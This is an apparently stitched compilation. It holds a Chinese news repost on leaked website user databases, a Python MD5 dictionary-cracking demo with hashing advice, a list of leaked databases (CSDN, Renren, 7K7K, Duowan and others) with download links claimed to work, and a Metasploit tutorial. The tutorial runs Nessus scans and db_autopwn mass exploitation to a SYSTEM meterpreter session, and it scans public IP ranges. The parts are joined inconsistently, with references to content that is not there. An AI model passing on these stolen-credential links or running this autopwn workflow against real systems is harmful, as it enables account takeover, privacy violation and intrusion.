Well-known Chinese hacker Goodwell told Sohu IT that the leaking of site databases is likely to trigger a chain reaction, with more sites' data released by hackers. Previously such databases were traded on the underground market and the hackers profited. But because many users' usernames and passwords are nearly identical across sites, once one hacker releases a site's database, the databases held by other hackers lose their value, and some of them, for various motives, will release other sites' databases, causing a chain reaction.

Goodwell said no site can be 100% secure, and for technically capable people the password is not the only way into a site. But once hackers release a site's user database, people without technical skills can do great damage to the site and to other users. And because most users' usernames and passwords are the same everywhere, these people may use them to stuff other sites' login forms, with a still larger impact. To turn this around, sites need to force all users to change their passwords and adopt their own hashing scheme so that user information is not leaked again.

Reportedly many sites have no awareness of protecting user information, and user data sits in their databases with no protection at all. Goodwell advises sites to raise their security awareness and strengthen data protection in both software and hardware. The most thorough protection, he told Sohu IT, is to change the site's static-password mechanism, apply a proprietary hashing function on top of MD5, and patch system vulnerabilities promptly.

Goodwell also advises users to be more security-conscious online. It is best to set a different password for each site; to make them easy to remember, vary the password according to the site's domain name.
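The dumps listed earlier store passwords three ways (plaintext, unsalted MD5, and 766.COM's md5(md5(pwd).salt) with a per-user salt), and Goodwell's advice above is about storage too. As an added example (not code from the reposted articles), here is the chain reaction he describes run offline: plaintext passwords from one site's dump used as the wordlist against another site's hashes, counting hash computations, which is what the attacker pays for. The wordlist, the users, the salts and the function names are constructed for the example; the final two functions show the per-user random salt plus slow KDF (PBKDF2 from the standard library) that a site should store instead of a home-grown MD5 variant.

```python
import hashlib
import hmac
import os
from typing import Dict, Iterable, Tuple


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def unsalted_md5(pw: str) -> str:
    """The 'MD5-hashed password' column of the Duowan/UUU9 dumps: no salt,
    so equal passwords give equal hashes across every user."""
    return md5_hex(pw.encode("utf-8"))


def salted_double_md5(pw: str, salt: str) -> str:
    """766.COM's scheme as listed above: md5(md5(pwd).salt)."""
    return md5_hex((md5_hex(pw.encode("utf-8")) + salt).encode("utf-8"))


class DictionaryAttack:
    """Runs a wordlist (here: plaintext passwords from another site's dump)
    against leaked hashes and counts hash computations."""
    def __init__(self, wordlist: Iterable[str]):
        self.words = list(wordlist)
        self.hash_calls = 0

    def crack_unsalted(self, targets: Dict[str, str]) -> Dict[str, str]:
        """targets: user -> md5 hex. Each word is hashed once and matched
        against every user at the same time."""
        lookup = {}
        for w in self.words:
            self.hash_calls += 1
            lookup[unsalted_md5(w)] = w
        return {u: lookup[h] for u, h in targets.items() if h in lookup}

    def crack_salted(self, targets: Dict[str, Tuple[str, str]]) -> Dict[str, str]:
        """targets: user -> (salt, hash). The per-user salt forces one hash
        per word per user; reused passwords still fall, just one user at a time."""
        found = {}
        for user, (salt, h) in targets.items():
            for w in self.words:
                self.hash_calls += 1
                if salted_double_md5(w, salt) == h:
                    found[user] = w
                    break
        return found


# Constructed stand-ins: a plaintext dump from site A (the wordlist) and the
# same people's accounts on site B, where two of them reused their password.
LEAKED_PLAINTEXT = ["123456", "password", "qwerty", "zhangsan2011"]
SITE_B_PASSWORDS = {"alice": "123456", "bob": "qwerty", "carol": "N0t-1n-any-dump!"}
SITE_B_SALTS = {"alice": "a1b2", "bob": "c3d4", "carol": "e5f6"}


def attack_unsalted_dump() -> Tuple[Dict[str, str], int]:
    targets = {u: unsalted_md5(p) for u, p in SITE_B_PASSWORDS.items()}
    atk = DictionaryAttack(LEAKED_PLAINTEXT)
    return atk.crack_unsalted(targets), atk.hash_calls


def attack_salted_dump() -> Tuple[Dict[str, str], int]:
    targets = {u: (SITE_B_SALTS[u], salted_double_md5(p, SITE_B_SALTS[u]))
               for u, p in SITE_B_PASSWORDS.items()}
    atk = DictionaryAttack(LEAKED_PLAINTEXT)
    return atk.crack_salted(targets), atk.hash_calls


# What to store instead: a random per-user salt and a deliberately slow KDF,
# so every guess costs the attacker `rounds` hash computations instead of one.
def pbkdf2_record(pw: str, rounds: int = 200_000) -> Tuple[bytes, bytes, int]:
    salt = os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", pw.encode("utf-8"), salt, rounds), rounds


def pbkdf2_verify(pw: str, record: Tuple[bytes, bytes, int]) -> bool:
    salt, digest, rounds = record
    candidate = hashlib.pbkdf2_hmac("sha256", pw.encode("utf-8"), salt, rounds)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


if __name__ == "__main__":
    print("unsalted:", attack_unsalted_dump())   # 2 of 3 cracked with 4 hashes
    print("salted:  ", attack_salted_dump())     # 2 of 3 cracked with 8 hashes
```

The salt does not protect a reused password; it only stops one pass over the wordlist from cracking every user at once. The slow KDF is what multiplies the cost per guess, and neither helps a user whose password is already in someone else's plaintext dump, which is why the responses from Renren and Kaixin above tell users to change reused passwords first.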
cnbeta数据库.tgz cnzz数据库.rar CSDN数据库.zip eNet数据库.rar gg.zip IS数据库.kz mail.rar me.zip UUU9.rar YY数据库.zip 爱慕.zip 百合网数据库.zip 多玩库.rar 非诚勿扰.rar 湖北模特.rar 佳品网.zip 金山毒霸.zip 开心网.rar 克洛斯.rar 美空数据库.zip 世纪家园数据库.zip 天涯数据库.zip 图虫网.zip 西游傲剑.rar 信息学院数据库.rar 珍爱网数据库.zip 走秀网.rar

 

Last tested: Dec 24, 11:48 AM; all download links below were working. If you reply that you cannot download, use QQ Xuanfeng: these files are on Tencent servers and can only be fetched with Xuanfeng.

CSDN:
http://hz.ftn.qq.com/ftn_handler/70188b37cc9bacd14cc66d14f198e3f3acb37c0c470a4d1ea2b8c5b464e9a30818482bf7c388c9b99ef60b0320effb78aeb11af47e6862e1a02946e9cd41ecd4/CSDN-中文IT社区-600万.rar?&&txf_sid=&&txf_fid=cbb3743788cf6dfaede7caa1d03f302d34af6f74

WEIBO
http://xa.ctfs.ftn.qq.com/ftn_handler/44c125bbafc55fd15d383b2fcf97096eabafaeaca0c587ce3ce1a7dfc627d3043d8f3db2f448b3d0e768b7ccbc562ad8bf3ea63f413feb34c3c4f5c81c9c49d1/weibo.com_12160.rar?&&txf_sid=&&txf_fid=c430dd803ad5a296b4eb6a735cf4d9ff6b3bbe46

Duowan
http://hz.ftn.qq.com/ftn_handler/c3a7f9c55d6a30b0d82bb59cd29e1cf5b806236fcfa53ab103d31a351be491d6b0cd02d4d044c1a618b0e77df48369c6c530ad937f7e5cec9ea99fe0eacdccc2/多玩网_800W.rar?&&txf_sid=&&txf_fid=31934dcfe45a53bf1008fb94fd9134dde4424589

7K7K
http://hz.ftn.qq.com/ftn_handler/0dc4e0a4032f7f0e4933ae787d8fb09454f9bb589036802d4fe56536d2f689af8e9cf396cf0178b9f53200280a71c47441d5afe061a051ff1f2b79670a296c8b/7k7k2000万_2047.rar?&&txf_sid=&&txf_fid=6d6eaee20b611db31448728c11e4697bff44c8f8

Duduniu
http://hz.ftn.qq.com/ftn_handler/4ef9f4ab11a11f52746af4e318b0304710d9f8f579f80acecdcf101e74fe36c12ef284016785eebc35e1003fc7726d69885ea8351d03de59fc656c5e4111f27d/嘟嘟牛_66277.rar?&&txf_sid=&&txf_fid=72c1a4457272bc78694e369f89fc72f19ae3af39

Renren
http://hz.ftn.qq.com/ftn_handler/4963f4036c99c79e809dba076c1d7d5fb0da3b8ea7bd2e9df1682eb90e8b42ecaf5f14d347764ea6171fc521df2d5902d13f0ed20de2ca10ef7f9e91a2dd5218/人人网500W_16610.rar?&&txf_sid=&&txf_fid=d90275d2adfec95c40ed323fd65568c6e94e847b

178

http://xa.ctfs.ftn.qq.com/ftn_handler/fb39ef4b8a38ba395e8d6fcf17bd9ea91a09addfc00537efa5221d1e72f6757a2a90fa25ea92f89e4f1e9449f7769ebdc55d91a4e66d676c68b524435f171bb9/178

 

The 178 link above is incomplete; the one below works.

ed2k://|file|178(1000w)_3087.rar|108534783|FFCD04A52339701C8CB5197BDCF9F4DC|/
ed2k://|file|7k7k2000万_2047.rar|203648704|6EB70910C1C193F5BE04610B503EF4A0|/
ed2k://|file|人人网500W_16610.rar|51969611|8CD19B7A2EB9F1F74CB8BFBDE7BD144D|/
ed2k://|file|嘟嘟牛_66277.rar|215666725|EF7187E33A8EBD9FD806343B7B1CAA82|/
ed2k://|file|多玩网_800W.rar|227441723|F8388A178222518978550D3E64B6129B|/
ed2k://|file|猫1000W_8228.rar|96411648|CE48CD1EA39666AA2B215D1B3028C845|/

 

metasploit db_autopwn & load nessus

Author:bugcx or Anonymous
Url:http://blog.bug.cx/2012/04/16/metasploit-db_autopwn-load-nessus/ | bugcx's blog | focused on network security

(Let's give it a spin)
root@bt:~# msfconsole
       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 831 exploits - 470 auxiliary - 143 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
       =[ svn r15107 updated yesterday (2012.04.14)
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help
[*]
Command                    Help Text
-------                    ---------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
Generic Commands
Plugin Commands
Policy Commands
Reports Commands
Scan Commands
User Commands
nessus_admin               Checks if user is an admin
nessus_connect             Connect to a nessus server
nessus_find_targets        Try to find vulnerable targets from a report
nessus_help                Listing of available nessus commands
nessus_logout              Logout from the nessus server
nessus_plugin_details      List details of a particular plugin
nessus_plugin_family       List plugins in a family
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_policy_del          Delete a policy
nessus_policy_list         List all polciies
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_host_detail  Detail from a report item on a host
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_hosts        Get list of hosts from a report
nessus_report_list         List all Nessus reports
nessus_save                Save nessus login info between sessions
nessus_scan_new            Create new Nessus Scan
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
nessus_scan_status         List all currently running Nessus scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_server_feed         Nessus Feed Type
nessus_server_prefs        Display Server Prefs
nessus_server_status       Check the status of your Nessus Server
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_list           Show Nessus Users
nessus_user_passwd         Change Nessus Users Password
[*]

Connect to Nessus (user:password@host; the plugin talks to the Nessus XML-RPC interface on port 8834):

msf > nessus_connect fuckyou:123456@192.168.8.9 ok
[*] Connecting to https://192.168.8.9:8834/ as fuckyou
[*] Authenticated
msf >

Add a Nessus user:

msf > nessus_user_add
[*] Usage:
[*] nessus_user_add <username> <password>
[*] Only adds non admin users
msf > nessus_user_add xxxooo 123456
[+] xxxooo has been added

List the users:

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
----     ---------  ----------
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   FALSE      08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970

xxxooo is not an admin (the plugin can only create non-admin users), so promote it with nessus-admin on the Nessus host:

root@bt:/opt/nessus/sbin# ./nessus-admin
Login : xxxooo
xxxooo is NOT an administrative user. Do you want to grant him admin rights? [y/n] y
xxxooo is now an administrator
root@bt:/opt/nessus/sbin#

Now look at the users again:

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
----     ---------  ----------
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   TRUE       08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970
msf >

Pick a scan policy:

msf > nessus_policy_list
[+] Nessus Policy List
[+]
ID  Name                                         Comments
--  ----                                         --------
-1  Prepare for PCI-DSS audits (section 11.2.2)
-2  Web App Tests
-3  External Network Scan
-4  Internal Network Scan
msf > nessus_scan_new
[*] Usage:
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -2 fuck 192.168.8.5
[*] Creating scan from policy number -2, called "fuck" and scanning 192.168.8.5
[*] Scan started.  uid is a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd

Check the scan status:

msf > nessus_scan_status
[+] Running Scans
[+]
Scan ID                                               Name  Owner    Started            Status   Current Hosts  Total Hosts
-------                                               ----  -----    -------            ------   -------------  -----------
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  fuckyou  05:40 Apr 16 2012  running  0              1
[+]
[*] You can:
[+]         Import Nessus report to database :  nessus_report_get <reportid>
[+]         Pause a nessus scan :           nessus_scan_pause <scanid>
msf >

List the scan reports:

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  running    06:04 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

Once the scan finishes, its status changes to completed:

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

Query the hosts in a given report:

msf > nessus_report_hosts 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Report Info
[+]
Hostname     Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
--------     --------  -----  -----  -----  -----  ----------------  --------------
192.168.8.1  19        8      19     0      0      48026             48026
192.168.8.2  25        8      24     1      0      48026             48026
192.168.8.3  29        8      28     1      0      48026             48026
192.168.8.4  25        6      24     1      0      48026             48026
192.168.8.5  66        13     56     4      6      48026             48026
192.168.8.6  20        6      19     1      0      48026             48026
192.168.8.7  387       13     84     49     254    48026             48026
192.168.8.8  64        5      47     8      9      48026             48026
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>
msf >

List the scan results for a given IP:

msf > nessus_report_host_ports 192.168.8.7 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Host Info
[+]
Port  Protocol  Severity  Service Name   Sev 0  Sev 1  Sev 2  Sev 3
----  --------  --------  ------------   -----  -----  -----  -----
0     icmp      1         general        0      2      0      0
0     tcp       1         general        0      21     0      0
0     udp       1         general        0      1      0      0
123   udp       1         ntp?           1      1      0      0
135   tcp       1         epmap          1      2      0      0
137   udp       1         netbios-ns     1      2      0      0
138   udp       1         netbios-dgm?   1      1      0      0
139   tcp       1         smb            1      2      0      0
445   udp       1         microsoft-ds?  1      1      0      0
445   tcp       3         cifs           1      26     42     253
500   udp       1         isakmp?        1      1      0      0
1025  tcp       1         dce-rpc        1      2      0      0
1041  tcp       1         dce-rpc        1      2      0      0
3389  tcp       3         msrdp          1      3      2      1
3790  tcp       2         www            1      16     5      0
4500  udp       1         ipsec-nat-t?   1      1      0      0
[*] You can:
[*]         Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>
msf >

Show the scan details for a given port on a given IP:

msf > nessus_report_host_detail 192.168.8.7 3389 tcp 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Port Info
[+]
Port              Severity  PluginID  Plugin Name                                                                                                     CVSS2  Exploit?  CVE                Risk Factor  CVSS Vector
----              --------  --------  -----------                                                                                                     -----  --------  ---                -----------  -----------
msrdp (3389/tcp)  1         34252     Microsoft Windows Remote Listeners Enumeration (WMI)                                                            none   .         []                 None         .
msrdp (3389/tcp)  1         10940     Windows Terminal Services Enabled                                                                               none   .         []                 None         .
msrdp (3389/tcp)  2         57690     Terminal Services Encryption Level is Medium or Low                                                             4.3    .         []                 Medium       CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  1         30218     Terminal Services Encryption Level is not FIPS-140 Compliant                                                    2.6    .         []                 Low          CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  2         18405     Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness                                     5.1    true      ["CVE-2005-1794"]  Medium       CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P
msrdp (3389/tcp)  3         58435     MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check)  9.3    true      ["CVE-2012-0002"]  High         CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C
msf >

Import a scan report:

msf > nessus_report_get
[*] Usage:
[*]        nessus_report_get <report id>
[*]        use nessus_report_list to list all available reports for importing
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.9
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

View the scanned hosts:

msf > hosts -c address,os_name,os_flavor,os_sp,vulns
Hosts
=====
address       os_name                   os_flavor  os_sp  vulns
-------       -------                   ---------  -----  -----
10.0.2.15     Microsoft Windows         XP         SP3    0
192.168.8.1   Linux                                       17
192.168.8.2   Microsoft Windows         7                 17
192.168.8.3   Microsoft Windows         2003       SP2    21
192.168.8.4   Microsoft Windows         7                 17
192.168.8.5   Microsoft Windows         2003       SP2    289
192.168.8.6   Microsoft Windows         XP                20
192.168.8.7   Microsoft Windows         2003       SP2    369
192.168.8.8   Linux  3.2.6 on Ubuntu 1                    48

View the vulnerabilities found on the scanned hosts:

msf > vulns
[*] Time: 2012-04-16 06:14:35 UTC Vuln: host=192.168.8.7 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Traceroute Information refs=NSS-10287
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Windows Summary of Missing Patches refs=NSS-38153
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Office Detection refs=NSS-27524
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Device Type refs=NSS-54615
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=OS Identification refs=NSS-11936
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : Disabled accounts refs=OSVDB-752,NSS-10913
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : Passwords never expire refs=OSVDB-755,NSS-10916
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : User has never logged on refs=OSVDB-754,NSS-10915

....... (remaining output omitted)

We can also use auto_exploit for mass exploitation.
Start PostgreSQL and create a database:

root@bt:/opt/nessus/sbin# /etc/init.d/postgresql-8.4 start
 * Starting PostgreSQL 8.4 database server
root@bt:~# psql -U postgres -h localhost
用户 postgres 的口令:
psql (8.4.10)
SSL连接 (加密:DHE-RSA-AES256-SHA,位元:256)
输入 “help” 来获取帮助信息.
postgres=# CREATE DATABASE fuck;
CREATE DATABASE
postgres=#

Connect msf to PostgreSQL:

msf > db_status
[*] postgresql connected to msf3dev
msf > db_connect postgres:123456@localhost:5432/fuck

List the Nessus reports and import one:

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

Load auto_exploit and run vuln_exploit:

msf > load auto_exploit
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP's and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.
msf > vuln_exploit    (output omitted; a Ruby problem came up here)

Or, better, use db_autopwn:

msf > load db_autopwn
msf > db_autopwn -t -e -p
............ (output omitted)
[*] (535/535 [1 sessions]): Waiting on 10 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 5 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
  Id  Type                   Information                            Connection                                            Via
  --  ----                   -----------                            ----------                                            ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)  exploit/windows/smb/ms08_067_netapi
[*] ================================================================================
msf > sessions -l
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)
msf > sessions -i 1
[*] Starting interaction with 1…
meterpreter > ipconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name         : AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 08:00:27:0d:dd:65
MTU          : 1500
IPv4 Address : 192.168.8.5
IPv4 Netmask : 255.255.255.0
meterpreter > background
[*] Backgrounding session 1…

auto_exploit.rb:auto_exploit

A first look at using scanners in Metasploit | using portscan and scanner/smb/smb_version

Port scanning tools:

[bash]

msf > search portscan

Matching Modules
================

Name                                      Disclosure Date  Rank    Description
----                                      ---------------  ----    -----------
auxiliary/scanner/natpmp/natpmp_portscan                   normal  NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack                             normal  TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce                       normal  FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn                             normal  TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp                             normal  TCP Port Scanner
auxiliary/scanner/portscan/xmas                            normal  TCP "XMas" Port Scanner
msf >

[/bash]

The port scanners above are all used in much the same way; they differ only in the type of scan and its purpose. Use them flexibly.

Taking one of them as an example:

[bash]

msf > use auxiliary/scanner/portscan/ftpbounce
msf auxiliary(ftpbounce) > show options

Module options (auxiliary/scanner/portscan/ftpbounce):

Name        Current Setting      Required  Description
----        ---------------      --------  -----------
BOUNCEHOST                       yes       FTP relay host
BOUNCEPORT  21                   yes       FTP relay port
FTPPASS     mozilla@example.com  no        The password for the specified username
FTPUSER     anonymous            no        The username to authenticate as
PORTS       1-10000              yes       Ports to scan (e.g. 22-25,80,110-900)
RHOSTS                           yes       The target address range or CIDR identifier
THREADS     1                    yes       The number of concurrent threads

msf auxiliary(ftpbounce) > set RHOSTS 108.171.217.91/24
RHOSTS => 108.171.217.91/24
msf auxiliary(ftpbounce) > set THREADS 600
THREADS => 600
msf auxiliary(ftpbounce) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: BOUNCEHOST.
msf auxiliary(ftpbounce) > set BOUNCEHOST 110.120.119.54
BOUNCEHOST => 110.120.119.54
msf auxiliary(ftpbounce) > run

[*] Scanned 107 of 256 hosts (041% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 255 of 256 hosts (099% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftpbounce) >

[/bash]

The other portscan tools are used in a similar way.

Scanning the target host's operating system type:

SMB: Server Message Block

[bash]

msf auxiliary(ftpbounce) > back
msf > search scanner/smb

Matching Modules
================

Name                                        Disclosure Date  Rank    Description
----                                        ---------------  ----    -----------
auxiliary/scanner/smb/pipe_auditor                           normal  SMB Session Pipe Auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor                    normal  SMB Session Pipe DCERPC Auditor
auxiliary/scanner/smb/smb2                                   normal  SMB 2.0 Protocol Detection
auxiliary/scanner/smb/smb_enumshares                         normal  SMB Share Enumeration
auxiliary/scanner/smb/smb_enumusers                          normal  SMB User Enumeration (SAM EnumUsers)
auxiliary/scanner/smb/smb_enumusers_domain                   normal  SMB Domain User Enumeration
auxiliary/scanner/smb/smb_login                              normal  SMB Login Check Scanner
auxiliary/scanner/smb/smb_lookupsid                          normal  SMB Local User Enumeration (LookupSid)
auxiliary/scanner/smb/smb_version                            normal  SMB Version Detection
msf >

[/bash]

smb/smb_version is used as follows; it can be used to enumerate a server's operating system. Generally speaking, though, you won't get anything out of servers: this leak is ancient, and even the most run-down server has it patched.

But when pentesting a personal computer this command is very useful; it can usually identify the operating system type.

[bash]

msf auxiliary(smb_version) > back
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > show options

Module options (auxiliary/scanner/smb/smb_version):

Name       Current Setting   Required  Description
----       ---------------   --------  -----------
RHOSTS     108.171.217.0/24  yes       The target address range or CIDR identifier
SMBDomain  WORKGROUP         no        The Windows domain to use for authentication
SMBPass                      no        The password for the specified username
SMBUser                      no        The username to authenticate as
THREADS    1024              yes       The number of concurrent threads

msf auxiliary(smb_version) > set RHOSTS 118.123.106.56/24
RHOSTS => 118.123.106.56/24
msf auxiliary(smb_version) > set THREADS 600
THREADS => 600
msf auxiliary(smb_version) > run

[*] Scanned 042 of 256 hosts (016% complete)
[*] Scanned 100 of 256 hosts (039% complete)
[*] Scanned 120 of 256 hosts (046% complete)
[*] Scanned 127 of 256 hosts (049% complete)
[*] Scanned 136 of 256 hosts (053% complete)
[*] Scanned 231 of 256 hosts (090% complete)
[*] Scanned 233 of 256 hosts (091% complete)
[*] Scanned 241 of 256 hosts (094% complete)
[*] Scanned 245 of 256 hosts (095% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed

[/bash]

A worked example of nmap scanning in Metasploit

Check the Metasploit database connection status. Metasploit 4.0 and later connect to the bundled database automatically, so loading db_mysql and then running db_connect, as was done before, is no longer necessary.

[bash]

msf > db_status
[*] postgresql connected to msf3dev

[/bash]

To see the commands starting with db_, type db_ and press Tab twice; the following is shown.

[bash]

msf > db_
db_connect db_export db_nmap db_status
db_disconnect db_import db_rebuild_cache

[/bash]

Of course, using the help command works just as well.

[bash]

msf > help

Core Commands
=============

Command       Description
-------       -----------
?             Help menu
back          Move back from the current context
banner        Display an awesome metasploit banner
cd            Change the current working directory
color         Toggle color
connect       Communicate with a host
exit          Exit the console
help          Help menu
info          Displays information about one or more module
irb           Drop into irb scripting mode
jobs          Displays and manages jobs
kill          Kill a job
load          Load a framework plugin
loadpath      Searches for and loads modules from a path
makerc        Save commands entered since start to a file
popm          Pops the latest module off of the module stack and makes it active
previous      Sets the previously loaded module as the current module
pushm         Pushes the active or list of modules onto the module stack
quit          Exit the console
reload_all    Reloads all modules from all defined module paths
resource      Run the commands stored in a file
route         Route traffic through a session
save          Saves the active datastores
search        Searches module names and descriptions
sessions      Dump session listings and display information about sessions
set           Sets a variable to a value
setg          Sets a global variable to a value
show          Displays modules of a given type, or all modules
sleep         Do nothing for the specified number of seconds
spool         Write console output into a file as well the screen
threads       View and manipulate background threads
unload        Unload a framework plugin
unset         Unsets one or more variables
unsetg        Unsets one or more global variables
use           Selects a module by name
version       Show the framework and console library version numbers

Database Backend Commands
=========================

Command           Description
-------           -----------
creds             List all credentials in the database
db_connect        Connect to an existing database
db_disconnect     Disconnect from the current database instance
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache
db_status         Show the current database status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces

msf >

[/bash]

db_nmap is used for port scanning and service discovery on hosts. Commonly used parameters:

-A : in-depth (aggressive) scan

-sS : tries to stay hidden while scanning. This parameter cannot be used together with -sI <some ip>.

-sI <some ip> : use this "some ip" as your own IP while scanning; when the other side checks, all they can see is that IP scanning them.

-oX <filename> : write the scan results to the file "filename", so that the results can be imported into Metasploit with db_import, after which db_autopwn can be used to attack automatically, right?

